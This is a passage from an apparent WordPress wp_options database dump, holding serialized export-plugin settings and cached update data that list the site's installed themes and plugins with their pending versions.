05:31:51\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2531\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}}s:10:\"post_count\";i:10;s:12:\"current_post\";i:-1;s:11:\"before_loop\";b:1;s:11:\"in_the_loop\";b:0;s:4:\"post\";r:100;s:8:\"comments\";N;s:13:\"comment_count\";i:0;s:15:\"current_comment\";i:-1;s:7:\"comment\";N;s:11:\"found_posts\";i:170;s:13:\"max_num_pages\";d:17;s:21:\"max_num_comment_pages\";i:0;s:9:\"is_single\";b:0;s:10:\"is_preview\";b:0;s:7:\"is_page\";b:0;s:10:\"is_archive\";b:0;s:7:\"is_date\";b:0;s:7:\"is_year\";b:0;s:8:\"is_month\";b:0;s:6:\"is_day\";b:0;s:7:\"is_time\";b:0;s:9:\"is_author\";b:0;s:11:\"is_category\";b:0;s:6:\"is_tag\";b:0;s:6:\"is_tax\";b:0;s:9:\"is_search\";b:0;s:7:\"is_feed\";b:0;s:15:\"is_comment_feed\";b:0;s:12:\"is_trackback\";b:0;s:7:\"is_home\";b:0;s:17:\"is_privacy_policy\";b:0;s:6:\"is_404\";b:0;s:8:\"is_embed\";b:0;s:8:\"is_paged\";b:0;s:8:\"is_admin\";b:1;s:13:\"is_attachment\";b:0;s:11:\"is_singular\";b:0;s:9:\"is_robots\";b:0;s:10:\"is_favicon\";b:0;s:13:\"is_posts_page\";b:0;s:20:\"is_post_type_archive\";b:0;s:25:\"\0WP_Query\0query_vars_hash\";s:32:\"d4169b773203f5100b473d9ac3353496\";s:28:\"\0WP_Query\0query_vars_changed\";b:0;s:17:\"thumbnails_cached\";b:0;s:37:\"\0*\0allow_query_attachment_by_filename\";b:0;s:19:\"\0WP_Query\0stopwords\";N;s:23:\"\0WP_Query\0compat_fields\";a:2:{i:0;s:15:\"query_vars_hash\";i:1;s:18:\"query_vars_changed\";}s:24:\"\0WP_Query\0compat_methods\";a:2:{i:0;s:16:\"init_query_flags\";i:1;s:15:\"parse_tax_query\";}}\";s:11:\"export_type\";s:8:\"specific\";s:21:\"filter_rules_hierarhy\";s:2:\"[]\";s:21:\"product_matching_mode\";s:6:\"strict\";s:17:\"wp_query_selector\";s:8:\"wp_query\";s:18:\"taxonomy_to_export\";s:0:\"\";s:18:\"created_at_version\";s:5:\"1.3.9\";s:23:\"sub_post_type_to_export\";s:0:\"\";s:18:\"is_loaded_template\";s:0:\"\";s:18:\"order_item_per_row\";i:1;s:29:\"order_item_fill_empty_columns\";i:1;s:8:\"filepath\";s:0:\"\";s:16:\"current_filepath\";s:0:\"\";s:10:\"bundlepath\";s:0:\"\";s:8:\"wp_query\";s:0:\"\";s:9:\"export_to\";s:3:\"csv\";s:15:\"export_to_sheet\";s:3:\"csv\";s:9:\"delimiter\";s:1:\",\";s:8:\"encoding\";s:5:\"UTF-8\";s:21:\"is_generate_templates\";i:1;s:18:\"is_generate_import\";i:1;s:9:\"import_id\";i:0;s:13:\"template_name\";s:34:\"Team Export - 2023 August 31 06:14\";s:12:\"is_scheduled\";i:0;s:16:\"scheduled_period\";s:0:\"\";s:15:\"scheduled_email\";s:0:\"\";s:8:\"cc_label\";s:143:\"a:8:{i:0;s:2:\"id\";i:1;s:5:\"title\";i:2;s:7:\"content\";i:3;s:7:\"excerpt\";i:4;s:16:\"dt_team_category\";i:5;s:3:\"url\";i:6;s:8:\"filename\";i:7;s:0:\"\";}\";s:7:\"cc_type\";s:143:\"a:8:{i:0;s:2:\"id\";i:1;s:5:\"title\";i:2;s:7:\"content\";i:3;s:7:\"excerpt\";i:4;s:4:\"cats\";i:5;s:9:\"image_url\";i:6;s:14:\"image_filename\";i:7;s:0:\"\";}\";s:8:\"cc_value\";s:143:\"a:8:{i:0;s:2:\"id\";i:1;s:5:\"title\";i:2;s:7:\"content\";i:3;s:7:\"excerpt\";i:4;s:16:\"dt_team_category\";i:5;s:3:\"url\";i:6;s:8:\"filename\";i:7;s:0:\"\";}\";s:7:\"cc_name\";s:142:\"a:8:{i:0;s:2:\"ID\";i:1;s:5:\"Title\";i:2;s:7:\"Content\";i:3;s:7:\"Excerpt\";i:4;s:15:\"Team Categories\";i:5;s:3:\"URL\";i:6;s:8:\"Filename\";i:7;s:0:\"\";}\";s:6:\"cc_php\";s:102:\"a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:1:\"0\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:1:\"0\";i:6;s:1:\"0\";i:7;s:1:\"0\";}\";s:7:\"cc_code\";s:94:\"a:8:{i:0;s:0:\"\";i:1;s:0:\"\";i:2;s:0:\"\";i:3;s:0:\"\";i:4;s:0:\"\";i:5;s:0:\"\";i:6;s:0:\"\";i:7;s:0:\"\";}\";s:6:\"cc_sql\";s:100:\"a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:1:\"0\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:0:\"\";i:6;s:0:\"\";i:7;s:1:\"0\";}\";s:10:\"cc_options\";s:254:\"a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:1:\"0\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:75:\"{\"is_export_featured\":true,\"is_export_attached\":true,\"image_separator\":\"|\"}\";i:6;s:77:\"{\"is_export_featured\":false,\"is_export_attached\":false,\"image_separator\":\"|\"}\";i:7;s:1:\"0\";}\";s:11:\"cc_settings\";s:138:\"a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:36:\"{\"export_images_from_gallery\":false}\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:1:\"0\";i:6;s:1:\"0\";i:7;s:1:\"0\";}\";s:13:\"friendly_name\";s:34:\"Team Export - 2023 August 31 06:13\";s:6:\"fields\";s:68:\"a:4:{i:0;s:7:\"default\";i:1;s:5:\"other\";i:2;s:2:\"cf\";i:3;s:4:\"cats\";}\";s:3:\"ids\";s:102:\"a:8:{i:0;s:1:\"1\";i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";}\";s:5:\"rules\";s:6:\"a:0:{}\";s:21:\"records_per_iteration\";s:2:\"50\";s:11:\"include_bom\";s:1:\"0\";s:17:\"include_functions\";i:1;s:19:\"split_large_exports\";s:1:\"0\";s:25:\"split_large_exports_count\";s:5:\"10000\";s:16:\"split_files_list\";s:6:\"a:0:{}\";s:12:\"main_xml_tag\";s:4:\"data\";s:14:\"record_xml_tag\";s:4:\"post\";s:16:\"save_template_as\";s:1:\"0\";s:4:\"name\";s:0:\"\";s:21:\"export_only_new_stuff\";s:1:\"0\";s:26:\"export_only_modified_stuff\";s:1:\"0\";s:24:\"creata_a_new_export_file\";s:1:\"0\";s:15:\"attachment_list\";s:6:\"a:0:{}\";s:21:\"order_include_poducts\";i:0;s:25:\"order_include_all_poducts\";i:0;s:21:\"order_include_coupons\";i:0;s:25:\"order_include_all_coupons\";i:0;s:23:\"order_include_customers\";i:0;s:27:\"order_include_all_customers\";i:0;s:9:\"migration\";s:0:\"\";s:17:\"xml_template_type\";s:6:\"simple\";s:19:\"custom_xml_template\";s:118:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<data>\r\n	<!-- BEGIN LOOP -->\r\n	<post>\r\n\r\n	</post>\r\n	<!-- END LOOP -->\r\n</data>\";s:26:\"custom_xml_template_header\";s:0:\"\";s:24:\"custom_xml_template_loop\";s:0:\"\";s:26:\"custom_xml_template_footer\";s:0:\"\";s:27:\"custom_xml_template_options\";s:6:\"a:0:{}\";s:22:\"custom_xml_cdata_logic\";s:4:\"auto\";s:21:\"show_cdata_in_preview\";s:1:\"0\";s:17:\"export_variations\";s:1:\"1\";s:23:\"export_variations_title\";s:1:\"1\";s:18:\"include_header_row\";i:1;s:9:\"wpml_lang\";s:3:\"all\";s:24:\"enable_export_scheduling\";s:5:\"false\";s:17:\"scheduling_enable\";s:1:\"0\";s:22:\"scheduling_weekly_days\";s:0:\"\";s:17:\"scheduling_run_on\";s:6:\"weekly\";s:22:\"scheduling_monthly_day\";s:0:\"\";s:16:\"scheduling_times\";s:17:\"a:1:{i:0;s:0:\"\";}\";s:19:\"scheduling_timezone\";s:12:\"Africa/Cairo\";s:15:\"update_previous\";s:1:\"1\";s:4:\"file\";s:0:\"\";}','no'),
(372240,'_wpallexport_session_expires_new_','1693634387','no'),
(377715,'fbv_is_new_user','1','yes'),
(377716,'fbv_first_time_active','1','yes'),
(377717,'fbv_version','5.5','yes'),
(377718,'fbv_review','1694083337','yes'),
(420376,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.3.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.3.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.3.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.3.2-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.3.2\";s:7:\"version\";s:5:\"6.3.2\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1698159234;s:15:\"version_checked\";s:5:\"6.3.2\";s:12:\"translations\";a:0:{}}','no'),
(426429,'_site_transient_timeout_php_check_08739488dce43399db7dbb4d03e23287','1698182727','no'),
(426430,'_site_transient_php_check_08739488dce43399db7dbb4d03e23287','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:3:\"7.0\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),
(433648,'_transient_timeout_wpb_notice_list','1698170940','no'),
(433649,'_transient_wpb_notice_list','[]','no'),
(433977,'_site_transient_timeout_theme_roots','1698161036','no'),
(433978,'_site_transient_theme_roots','a:10:{s:13:\"consultstreet\";s:7:\"/themes\";s:7:\"dt-the7\";s:7:\"/themes\";s:10:\"dt-the7old\";s:7:\"/themes\";s:10:\"gap-exceed\";s:7:\"/themes\";s:9:\"rudaltoto\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";s:4:\"zinl\";s:7:\"/themes\";}','no'),
(433979,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1698159236;s:7:\"checked\";a:7:{s:13:\"consultstreet\";s:5:\"2.5.1\";s:7:\"dt-the7\";s:6:\"11.7.3\";s:12:\"twentytwenty\";s:3:\"2.2\";s:15:\"twentytwentyone\";s:3:\"1.9\";s:17:\"twentytwentythree\";s:3:\"1.2\";s:15:\"twentytwentytwo\";s:3:\"1.5\";s:4:\"zinl\";s:5:\"1.0.0\";}s:8:\"response\";a:3:{s:13:\"consultstreet\";a:6:{s:5:\"theme\";s:13:\"consultstreet\";s:11:\"new_version\";s:5:\"2.5.4\";s:3:\"url\";s:43:\"https://wordpress.org/themes/consultstreet/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/consultstreet.2.5.4.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:12:\"twentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"2.3\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.2.3.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:7:\"dt-the7\";a:6:{s:5:\"theme\";s:7:\"dt-the7\";s:11:\"new_version\";s:8:\"11.9.2.1\";s:3:\"url\";s:26:\"https://the7.io/changelog/\";s:7:\"package\";s:80:\"https://repo.the7.io/theme/download.php?code=the7_purchase_code&version=11.9.2.1\";s:8:\"requires\";s:3:\"5.4\";s:12:\"requires_php\";s:5:\"7.0.0\";}}s:9:\"no_update\";a:3:{s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"1.9\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.9.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.2\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.2.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.5.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','no'),
(433980,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1698159237;s:8:\"response\";a:27:{s:42:\"stripe-payments/accept-stripe-payments.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:29:\"w.org/plugins/stripe-payments\";s:4:\"slug\";s:15:\"stripe-payments\";s:6:\"plugin\";s:42:\"stripe-payments/accept-stripe-payments.php\";s:11:\"new_version\";s:6:\"2.0.81\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/stripe-payments/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/stripe-payments.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/stripe-payments/assets/icon-128x128.png?rev=2705524\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/stripe-payments/assets/banner-772x250.png?rev=2705587\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.0\";}s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:3:\"5.3\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/akismet.5.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:6:\"5.6.20\";}s:27:\"coming-soon/coming-soon.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/coming-soon\";s:4:\"slug\";s:11:\"coming-soon\";s:6:\"plugin\";s:27:\"coming-soon/coming-soon.php\";s:11:\"new_version\";s:9:\"6.15.15.3\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/coming-soon/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/coming-soon.6.15.15.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/coming-soon/assets/icon-256x256.png?rev=2402574\";s:2:\"1x\";s:64:\"https://ps.w.org/coming-soon/assets/icon-128x128.png?rev=2402575\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/coming-soon/assets/banner-1544x500.png?rev=2683810\";s:2:\"1x\";s:66:\"https://ps.w.org/coming-soon/assets/banner-772x250.png?rev=2683809\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.8.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.8.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.4\";}s:39:\"disable-gutenberg/disable-gutenberg.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/disable-gutenberg\";s:4:\"slug\";s:17:\"disable-gutenberg\";s:6:\"plugin\";s:39:\"disable-gutenberg/disable-gutenberg.php\";s:11:\"new_version\";s:3:\"3.1\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/disable-gutenberg/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/disable-gutenberg.3.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-256x256.png?rev=1925990\";s:2:\"1x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-128x128.png?rev=1925990\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:3:\"6.4\";s:12:\"requires_php\";s:6:\"5.6.20\";}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:6:\"3.16.6\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.6.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=2597493\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=2597493\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.0\";}s:28:\"fast-velocity-minify/fvm.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:34:\"w.org/plugins/fast-velocity-minify\";s:4:\"slug\";s:20:\"fast-velocity-minify\";s:6:\"plugin\";s:28:\"fast-velocity-minify/fvm.php\";s:11:\"new_version\";s:5:\"3.4.1\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/fast-velocity-minify/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/fast-velocity-minify.3.4.1.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/fast-velocity-minify/assets/icon-128x128.jpg?rev=1440946\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:75:\"https://ps.w.org/fast-velocity-minify/assets/banner-772x250.jpg?rev=1440936\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.3.3\";s:12:\"requires_php\";s:3:\"7.3\";}s:21:\"filebird/filebird.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:22:\"w.org/plugins/filebird\";s:4:\"slug\";s:8:\"filebird\";s:6:\"plugin\";s:21:\"filebird/filebird.php\";s:11:\"new_version\";s:5:\"5.5.3\";s:3:\"url\";s:39:\"https://wordpress.org/plugins/filebird/\";s:7:\"package\";s:51:\"https://downloads.wordpress.org/plugin/filebird.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/filebird/assets/icon-128x128.gif?rev=2299145\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/filebird/assets/banner-1544x500.png?rev=2350008\";s:2:\"1x\";s:63:\"https://ps.w.org/filebird/assets/banner-772x250.png?rev=2350008\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";b:0;}s:47:\"file-manager-advanced/file_manager_advanced.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:35:\"w.org/plugins/file-manager-advanced\";s:4:\"slug\";s:21:\"file-manager-advanced\";s:6:\"plugin\";s:47:\"file-manager-advanced/file_manager_advanced.php\";s:11:\"new_version\";s:5:\"5.1.2\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/file-manager-advanced/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/file-manager-advanced.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/file-manager-advanced/assets/icon-128x128.png?rev=1947474\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:76:\"https://ps.w.org/file-manager-advanced/assets/banner-772x250.png?rev=2839960\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.0\";}s:25:\"fluentform/fluentform.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:24:\"w.org/plugins/fluentform\";s:4:\"slug\";s:10:\"fluentform\";s:6:\"plugin\";s:25:\"fluentform/fluentform.php\";s:11:\"new_version\";s:6:\"5.0.12\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/fluentform/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/fluentform.5.0.12.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/fluentform/assets/icon-256x256.png?rev=1794277\";s:2:\"1x\";s:63:\"https://ps.w.org/fluentform/assets/icon-128x128.png?rev=1794277\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/fluentform/assets/banner-1544x500.png?rev=2957809\";s:2:\"1x\";s:65:\"https://ps.w.org/fluentform/assets/banner-772x250.png?rev=2957809\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.1\";}s:45:\"olympus-google-fonts/olympus-google-fonts.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:34:\"w.org/plugins/olympus-google-fonts\";s:4:\"slug\";s:20:\"olympus-google-fonts\";s:6:\"plugin\";s:45:\"olympus-google-fonts/olympus-google-fonts.php\";s:11:\"new_version\";s:5:\"3.4.5\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/olympus-google-fonts/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/olympus-google-fonts.3.4.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/olympus-google-fonts/assets/icon-256x256.jpg?rev=2812012\";s:2:\"1x\";s:73:\"https://ps.w.org/olympus-google-fonts/assets/icon-128x128.jpg?rev=2812012\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/olympus-google-fonts/assets/banner-1544x500.jpg?rev=2812012\";s:2:\"1x\";s:75:\"https://ps.w.org/olympus-google-fonts/assets/banner-772x250.jpg?rev=2812012\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";b:0;}s:25:\"formidable/formidable.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:24:\"w.org/plugins/formidable\";s:4:\"slug\";s:10:\"formidable\";s:6:\"plugin\";s:25:\"formidable/formidable.php\";s:11:\"new_version\";s:5:\"6.5.2\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/formidable/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/formidable.6.5.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/formidable/assets/icon-256x256.png?rev=2588749\";s:2:\"1x\";s:63:\"https://ps.w.org/formidable/assets/icon-128x128.png?rev=2588749\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/formidable/assets/banner-1544x500.png?rev=2588749\";s:2:\"1x\";s:65:\"https://ps.w.org/formidable/assets/banner-772x250.png?rev=2588749\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.2\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:13:\"give/give.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:18:\"w.org/plugins/give\";s:4:\"slug\";s:4:\"give\";s:6:\"plugin\";s:13:\"give/give.php\";s:11:\"new_version\";s:5:\"3.0.3\";s:3:\"url\";s:35:\"https://wordpress.org/plugins/give/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/plugin/give.3.0.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:57:\"https://ps.w.org/give/assets/icon-256x256.jpg?rev=2873287\";s:2:\"1x\";s:57:\"https://ps.w.org/give/assets/icon-128x128.jpg?rev=2873287\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/give/assets/banner-1544x500.jpg?rev=2979689\";s:2:\"1x\";s:59:\"https://ps.w.org/give/assets/banner-772x250.jpg?rev=2979689\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.2\";}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:44:\"w.org/plugins/google-analytics-for-wordpress\";s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:6:\"plugin\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:11:\"new_version\";s:6:\"8.20.1\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/google-analytics-for-wordpress/\";s:7:\"package\";s:80:\"https://downloads.wordpress.org/plugin/google-analytics-for-wordpress.8.20.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=2976619\";s:3:\"svg\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=2976619\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:86:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-1544x500.png?rev=2159532\";s:2:\"1x\";s:85:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-772x250.png?rev=2159532\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"5.6.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.2\";}s:56:\"motopress-hotel-booking-lite/motopress-hotel-booking.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:42:\"w.org/plugins/motopress-hotel-booking-lite\";s:4:\"slug\";s:28:\"motopress-hotel-booking-lite\";s:6:\"plugin\";s:56:\"motopress-hotel-booking-lite/motopress-hotel-booking.php\";s:11:\"new_version\";s:5:\"4.8.3\";s:3:\"url\";s:59:\"https://wordpress.org/plugins/motopress-hotel-booking-lite/\";s:7:\"package\";s:77:\"https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.8.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/motopress-hotel-booking-lite/assets/icon-256x256.png?rev=2665764\";s:2:\"1x\";s:81:\"https://ps.w.org/motopress-hotel-booking-lite/assets/icon-128x128.png?rev=2665764\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:84:\"https://ps.w.org/motopress-hotel-booking-lite/assets/banner-1544x500.jpg?rev=2723398\";s:2:\"1x\";s:83:\"https://ps.w